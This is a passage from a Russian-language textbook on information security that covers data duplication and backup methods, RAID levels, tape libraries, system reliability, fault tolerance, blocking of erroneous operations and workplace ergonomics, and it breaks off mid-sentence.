244 Рис. 43. Задачи защиты информации в АС от случайных угроз По времени восстановления информации методы дублирования мо- гут быть разделены на: оперативные; неоперативные. К оперативным методам относятся методы дублирования информа- ции, которые позволяют использовать дублирующую информацию в ре- альном масштабе времени. Это означает, что переход к использованию дублирующей информации осуществляется за время, которое позволяет выполнить запрос на использование информации в режиме реального времени для данной АС. Все методы, не обеспечивающие выполнения этого условия, относят к неоперативным методам дублирования. По используемым для целей дублирования средствам методы дуб- лирования можно разделить на методы, использующие: дополнительные внешние запоминающие устройства (блоки); специально выделенные области памяти на несъемных машин- ных носителях; съемные носители информации. По числу копий методы дублирования делятся на: одноуровневые; многоуровневые. Как правило, число уровней не превышает 3. По степени простран- ственной удаленности носителей основной и дублирующей информации методы дублирования могут быть разделены на методы:
245 сосредоточенного дублирования; рассредоточенного дублирования. Для определённости целесообразно считать методами сосредото- ченного дублирования такие методы, для которых носители с основной и дублирующей информацией находятся в одном помещении. Все дру- гие методы относятся к рассредоточенным. В соответствии с процедурой дублирования различают методы: полного копирования; зеркального копирования; частичного копирования; комбинированного копирования. При полном копировании дублируются все файлы. При зеркальном копировании любые изменения основной инфор- мации сопровождаются такими же изменениями и дублирующей ин- формации. При таком дублировании основная информация и дубль все- гда идентичны. Частичное копирование предполагает создание дублей определен- ных файлов, например, файлов пользователя. Одним из видов частично- го копирования, получившим название инкрементного копирования, яв- ляется метод создания дублей файлов, измененных со времени послед- него копирования. Комбинированное копирование допускает комбинации, например, полного и частичного копирования с различной периодичностью их проведения. Наконец, по виду дублирующей информации методы дублирования разделяются на: методы со сжатием информации; методы без сжатия информации. В качестве внешних запоминающих устройств для хранения дубли- рующей информации используются накопители на жестких магнитных дисках и магнитных лентах. Накопители на жестких магнитных дисках применяются обычно для оперативного дублирования информации. Идеология надежного и эффективного хранения информации на жестких дисках нашла свое отражение в так называемой технологии RAID (Re- dundant Array of Independent Disks). Эта технология реализует концеп- цию создания блочного устройства хранения данных с возможностями параллельного выполнения запросов и восстановления информации при отказах отдельных блоков накопителей на жестких магнитных дисках.
246 Устройства, реализующие эту технологию, называют подсистемами RAID или дисковыми массивами RAID. Технология RAID явилась результатом развития технологий надеж- ного хранения информации на жестких дисках, которые применяются и сейчас. Наиболее простым методом дублирования данных в АС является использование выделенных областей памяти на рабочем диске. Таким образом, дублируется наиболее важная системная информация. Напри- мер, таблицы каталогов и таблицы файлов дублируются таким образом, чтобы они были размещены на цилиндрах и поверхностях жесткого дис- ка (пакета дисков), отличных от тех, на которых находятся рабочие таб- лицы. Такое дублирование защищает от полной потери информации при повреждении отдельных участков поверхности дисков. Очень надежным методом оперативного дублирования является ис- пользование зеркальных дисков. Зеркальным называют жесткий магнит- ный диск отдельного накопителя, на котором хранится информация полностью идентичная информации на рабочем диске. Достигается это за счет параллельного выполнения всех операций записи на оба диска. При отказе рабочего накопителя автоматически осуществляется переход на работу с зеркальным диском практически без потерь времени при полной сохранности информации. Для особо ответственных применений (военные системы, АС тех- нологическими процессами, серверы сетей и некоторые другие) могут использоваться более одного резервного диска, подключенных к отдель- ным контроллерам и блокам питания. Зеркальное дублирование обеспе- чивает надежное оперативное дублирование, но требует, как минимум, вдвое больших аппаратных затрат. Зеркальное дублирование предусматривается на 1-м уровне RAID. Всего в технологии RAID выделяется 6 основных уровней с 0-го по 5-й. С учетом различных модификаций их может быть больше. Уровни RAID определяют порядок записи на независимые диски и порядок восстанов- ления информации. Различные уровни RAID обеспечивают различное быстродействие подсистемы и различную эффективность восстановле- ния информации. 0-ой уровень RAID предполагает поочередное исполь- зование блоков (накопителей на магнитных дисках) для записи файлов. Дублирование не используется. На 2-ом уровне биты информации поочередно размещаются на дис- ках. Данные размещаются на дисках с дублированием. Начиная с 3-го уровня, для восстановления информации используется не дублирование
247 данных, а контрольная информация. Восстановление возможно при от- казе одного диска. На 3-м уровне байты данных поочередно записываются на диски. Контрольная информация (контрольные суммы) записывается на один выделенный диск. Начиная с 4-го уровня, поочередная запись на диски ведется блока- ми. На 4-м уровне для записи контрольной информации отводится выде- ленный диск. Подсистема 4-го уровня допускает параллельное выполне- ние запросов на чтение, но запись осуществляется последовательно, так как контрольная информация записывается на один диск. На 5-м уровне осуществляется поочередная запись на диски, как блоков данных, так и контрольной информации. На этом уровне воз- можно осуществлять одновременно несколько операций чтения или за- писи. В случае отказа одного диска он восстанавливается с помощью контрольной информации. Для восстановления информации с отказав- шего диска требуется до 10 минут времени. Блочная конструкция подсистем RAID позволяет наращивать число дисков. Реальные подсистемы поддерживают несколько уровней, кото- рые выбираются пользователем с учетом требований, предъявляемых к HDD конкретной АС. В подсистемах RAID, как правило, используются резервные источники питания, что существенно повышает отказоустой- чивость таких подсистем. Для дублирования информации используются также накопители на магнитных лентах. Такие устройства обладают большой емкостью, но значительно уступают накопителям на магнитных дисках по времени доступа к информации. В настоящее время для хранения дублирующей информации ис- пользуются устройства, получившие название ленточные системы с ав- томатической сменой кассет. Их называют также библиотеками. Такие системы состоят из одного или нескольких лентопротяжных механиз- мов, механизма перемещения кассет и магазина для кассет. На одной кассете может храниться 10 Гбайт сжатой или 4 Гбайта несжатой ин- формации. Если учесть, что в магазине системы может находиться до 60 кассет (Spectra Logic 4655), то емкость таких систем позволяет хранить огромные массивы данных. Наряду с такими мощными системами могут использоваться и компактные системы с емкостью магазина в несколько кассет. Например, ленточная система Conner Peripherals 4586 NP имеет магазин емкостью 4 кассеты. С учетом возможности замены кассет та- кие системы позволяют дублировать на ленты объемы информации,
248 ограниченные только наличием свободных кассет. Как правило, библио- теки используются для неоперативного дублирования. Поэтому инфор- мация на ленты обычно записывается в сжатом виде. С помощью этих устройств осуществляется полное, частичное и комбинированное копи- рование с созданием копий различных уровней. Съемные машинные носители могут использоваться для дублиро- вания информации без использования специальных аппаратных средств. Для этих целей используются, как правило, гибкие магнитные диски, оптоэлектронные диски, а также жесткие съемные магнитные диски и магнитные ленты. Методы использования съемных носителей информации сходны с методами использования ленточных систем с автоматической сменой кассет. При использовании многоуровневого дублирования может быть ре- ализован следующий подход к созданию и использованию копий. В ка- честве эталона верхнего уровня используется редко изменяемая инфор- мация (программы, постоянные исходные данные). Носитель с этой ин- формацией используется только для восстановления информации, если ее невозможно восстановить с эталонов более низкого уровня, а также при изменениях информации и при периодическом контроле. Эталон второго уровня получается путем полного копирования информации с определенной периодичностью, например, один раз в сутки. На эталон первого уровня осуществляется инкрементное копирование либо по времени (раз в смену), либо после существенных и важных изменений. Например, получение важных сообщений по сети или результатов вы- полнения программ. Распределенное копирование достижимо в компьютерных сетях и является практически единственным способом обеспечения целостности и доступности информации при стихийных бедствиях и крупных авариях. Повышение надежности АС Под надежностью понимается свойство системы выполнять возло- женные на нее задачи в определенных условиях эксплуатации. При наступлении отказа компьютерная система не может выполнять все предусмотренные документацией задачи, т.е. переходит из исправного состояния в неисправное. Если при наступлении отказа АС способна выполнять заданные функции, сохраняя значения основных характери- стик в пределах, установленных технической документацией, то система находится в работоспособном состоянии.
249 С точки зрения обеспечения безопасности информации необходимо обеспечивать хотя бы работоспособное состояние АС. Для решения этой за- дачи необходимо обеспечить высокую надежность функционирования ал- горитмов, программ и технических (аппаратных) средств. Поскольку алго- ритмы в АС реализуются за счет выполнения программ, то надежность ал- горитмов отдельно не рассматривается. В этом случае считается, что надеж- ность АС обеспечивается надежностью программных и аппаратных средств. Надежность АС достигается за счет решения комплекса задач на этапах: разработки; производства; эксплуатации. Для программных средств рассматриваются этапы разработки и эксплуатации. Этап разработки является определяющим при создании надежных систем. На этом этапе основными направлениями повышения надежности программных средств являются: корректная постановка задачи на разработку; использование прогрессивных технологий программирования; контроль правильности функционирования. Корректность постановки задачи достигается в результате совмест- ной работы специалистов предметной области и высокопрофессиональ- ных программистов-алгоритмистов. В настоящее время для повышения качества программных продуктов используются современные технологии программирования (например, CASE технология). Эти технологии позволяют значительно сократить воз- можности внесения субъективных ошибок разработчиков. Они характери- зуются высокой автоматизацией процесса программирования, использова- нием стандартных программных модулей, широкими возможностями ком- плексирования этих модулей и тестирования их совместной работы. Контроль правильности функционирования алгоритмов и программ осуществляется на каждом этапе разработки и завершается комплекс- ным контролем, охватывающим все решаемые задачи и режимы. На этапе эксплуатации программные средства дорабатываются, в них устраняются замеченные ошибки. Поддерживается целостность программных средств и актуальность данных, используемых этими средствами. Надежность технических средств АС обеспечивается на всех эта- пах. На этапе разработки выбираются элементная база, технология про-
250 изводства и структурные решения, обеспечивающие максимально до- стижимую надежность АС в целом. Велика роль в процессе обеспечения надежности ТС и этапа произ- водства. Главными условиями выпуска надежной продукции являются высокий технологический уровень производства и организация эффек- тивного контроля качества выпускаемых ТС. Удельный вес этапа эксплуатации ТС в решении проблемы обеспе- чения надежности АС в последние годы значительно снизился. Для определённых видов вычислительной техники, таких как персональные ЭВМ, уровень требований к процессу технической эксплуатации сни- зился практически до уровня эксплуатации бытовых приборов. Второй особенностью нынешнего этапа эксплуатации средств вычислительной техники является сближение эксплуатации технических и программных средств (особенно средств общего программного обеспечения). Тем не менее, роль этапа эксплуатации ТС остается достаточно значимой в ре- шении задачи обеспечения надежности АС и, прежде всего, надежности сложных систем. Создание отказоустойчивых КС Отказоустойчивость – это свойство АС сохранять работоспособ- ность при отказах отдельных устройств, блоков, схем. Известны три ос- новных подхода к созданию отказоустойчивых систем: простое резервирование; помехоустойчивое кодирование информации; создание адаптируемых систем. Любая отказоустойчивая система обладает избыточностью. Одним из наиболее простых и действенных путей создания отказоустойчивых систем является простое резервирование. Простое резервирование осно- вано на использовании устройств, блоков, узлов, схем только в качестве резервных. При отказе основного элемента осуществляется переход на использование резервного. Резервирование осуществляется на различ- ных уровнях: на уровне устройств, на уровне блоков, узлов и т. д. Резер- вирование отличается также и глубиной. Для целей резервирования мо- гут использоваться один резервный элемент и более. Уровни и глубина резервирования определяют возможности системы парировать отказы, а также аппаратные затраты. Такие системы должны иметь несложные аппаратно-программные средства контроля работоспособности элемен- тов и средства перехода на использование, при необходимости, резерв- ных элементов. Примером резервирования может служить использова- ние "зеркальных" накопителей на жестких магнитных дисках. Недостат-
251 ком простого резервирования являются значительные затраты средств, которые используются только для повышения отказоустойчивости. Помехоустойчивое кодирование основано на использовании ин- формационной избыточности. Рабочая информация в АС дополняется определенным объемом специальной контрольной информации. Нали- чие этой контрольной информации (контрольных двоичных разрядов) позволяет путем выполнения определенных действий над рабочей и контрольной информацией определять ошибки и даже исправлять их. Так как ошибки являются следствием отказов средств КС, то, используя исправляющие коды, можно парировать часть отказов. Исправляющие возможности кодов для конкретного метода помехоустойчивого кодиро- вания зависят от степени избыточности. Чем больше используется кон- трольной информации, тем шире возможности кода по обнаружению и исправлению ошибок. Ошибки характеризуются кратностью, т.е. коли- чеством двоичных разрядов, в которых одновременно искажено содер- жимое. Помехоустойчивые коды обладают различными возможностями по обнаружению и исправлению ошибок различной кратности. Так клас- сический код Хемминга обнаруживает и исправляет однократные ошиб- ки, а двукратные ошибки – только обнаруживает. Помехоустойчивое кодирование наиболее эффективно при париро- вании самоустраняющихся отказов, называемых сбоями. Помехоустой- чивое кодирование при создании отказоустойчивых систем, как правило, используется в комплексе с другими подходами повышения отказо- устойчивости. Наиболее совершенными системами, устойчивыми к отказам, яв- ляются адаптивные системы. В них достигается разумный компромисс между уровнем избыточности, вводимым для обеспечения устойчивости (толерантности) системы к отказам, и эффективностью использования таких систем по назначению. В адаптивных системах реализуется так называемый принцип эле- гантной деградации. Этот принцип предполагает сохранение работоспо- собного состояния системы при некотором снижении эффективности функционирования в случаях отказов ее элементов. Адаптивные системы содержат аппаратно-программные средства для автоматического контроля работоспособности элементов системы и осуществления ее реконфигурации при возникновении отказов элемен- тов. При реконфигурации восстанавливается необходимая информация (при ее утрате), отключается отказавший элемент, осуществляется изме- нение связей и режимов работы элементов системы.
252 Простым примером адаптивной АС может служить ЭВМ, имеющая в своем составе математический и графический сопроцессоры, а также оперативную память блочной структуры. Все сопроцессоры и блоки па- мяти используются для достижения максимальной производительности ЭВМ. При отказе какого-либо сопроцессора он логически отключается от ЭВМ, а его функции выполняет центральный процессор. При этом система деградирует, так как снижается производительность ЭВМ. Но в то же время система сохраняет работоспособность и может завершить вычислительный процесс. При отказе блока оперативной памяти он от- ключается, и емкость памяти уменьшается. Чтобы избежать потерь ин- формации при отказах процессоров и блоков оперативной памяти, вы- числительный процесс возобновляется либо сначала, либо с последней контрольной точки. Механизм контрольных точек используется обычно при выполне- нии сложных трудоемких программ. Он заключается в запоминании всей необходимой информации для возобновления выполнения про- граммы с определенной точки. Запоминание осуществляется через опре- деленные интервалы времени. В адаптивных системах даже внешние устройства не используются только как резервные. Информация, необходимая для восстановления данных с отказавшего HDD, хранится на накопителях, которые исполь- зуются для хранения и рабочей информации. Примером таких систем являются RAID системы. Блокировка ошибочных операций Ошибочные операции или действия могут вызываться отказами ап- паратных и программных средств, а также ошибками пользователей и обслуживающего персонала. Некоторые ошибочные действия могут привести к нарушениям целостности, доступности и конфиденциально- сти информации. Ошибочная запись в ОП и на HDD, нарушение разгра- ничения памяти при мультипрограммных режимах работы ЭВМ, оши- бочная выдача информации в канал связи, короткие замыкания и обрыв проводников – вот далеко не полный перечень ошибочных действий, ко- торые представляют реальную угрозу безопасности информации в АС. Для блокировки ошибочных действий используются технические и аппаратно-программные средства. Технические средства используются в основном для предотвраще- ния ошибочных действий людей. К таким средствам относятся блокиро- вочные тумблеры, защитные экраны и ограждения, предохранители, средства блокировки записи на магнитные ленты и магнитные дискеты.
253 Аппаратно-программные средства позволяют, например, блокиро- вать вычислительный процесс при нарушениях программами адресных пространств оперативной памяти с помощью граничных регистров или ключей защиты. При мультипрограммных режимах работы ЭВМ опера- тивная память распределяется между программами. Приведенный меха- низм позволяет сравнивать адреса команд активной программы с грани- цами разрешенной области ОП для этой программы и блокировать об- ращение при нарушении границ. Аппаратно-программные средства ис- пользуются также для блокирования выдачи информации в неразрешен- ные каналы связи, запрета выполнения операций, которые доступны только в определенных режимах, например, в режиме работы операци- онной системы. С помощью аппаратно-программных средств может быть заблокирована запись в определенные области внешних запомина- ющих устройств и некоторые другие операции. На программном уровне могут устанавливаться атрибуты файлов, в том числе и атрибут, запрещающий запись в файлы. С помощью про- граммных средств устанавливается режим обязательного подтверждения выполнения опасных операций, таких как уничтожение файлов, размет- ка или форматирование HDD и другие. Оптимизация взаимодействия человека с КС Одним из основных направлений защиты информации в АС от не- преднамеренных угроз является сокращения числа ошибок пользовате- лей и обслуживающего персонала, а также минимизация последствий этих ошибок. Для достижения этих целей необходимы: научная организация труда человека; воспитание и обучение пользователей и персонала; анализ и совершенствование процессов взаимодействия человека с АС. Научная организация труда предполагает: оборудование рабочих мест; оптимальный режим труда и отдыха; дружественный интерфейс (связь, диалог) человека с АС. Рабочее место пользователя или специалиста из числа обслужива- ющего персонала должно быть оборудовано в соответствии с рекомен- дациями эргономики. Освещение рабочего места; температурно- влажностный режим; расположение табло, индикаторов, клавиш и тум- блеров управления; размеры и цвет элементов оборудования, помеще- ния; положение пользователя (специалиста) относительно оборудова- ния; использование защитных средств – все это должно обеспечивать
254 максимальную производительность человека в течение рабочего дня. Одновременно сводится к минимуму утомляемость работника и отрица- тельное воздействие на его здоровье неблагоприятных факторов произ- водственного процесса. Для людей, работающих с КС, основными не- благоприятными факторами являются: излучения мониторов, шумы электромеханических устройств, гиподинамия, и, как правило, высокие нагрузки на нервную систему. Вредные воздействия устройств постоян- но уменьшаются за счет совершенствования самих устройств и в резуль- тате использования защитных экранов. Последствия гиподинамии (ма- лоподвижного, статического положения человека на рабочем месте) и высокие нагрузки на нервную систему компенсируются оптимальным режимом труда и отдыха, а также совершенствованием процесса обще- ния человека с АС. Так при работе с ЭВМ медики рекомендуют 10-15 минутные перерывы через каждый час работы. Во время перерывов сле- дует выполнять физические упражнения и упражнения на снятие психи- ческих нагрузок. Продолжительность работы с использованием монито- ра не должна превышать 6 часов за рабочий день. При сменной органи- зации труда после 6 часов работы должен предоставляться отдых, про- должительность которого определяется длительностью смены. Прогресс в области электронной вычислительной техники позволил значительно облегчить взаимодействие человека с ЭВМ. Если на заре<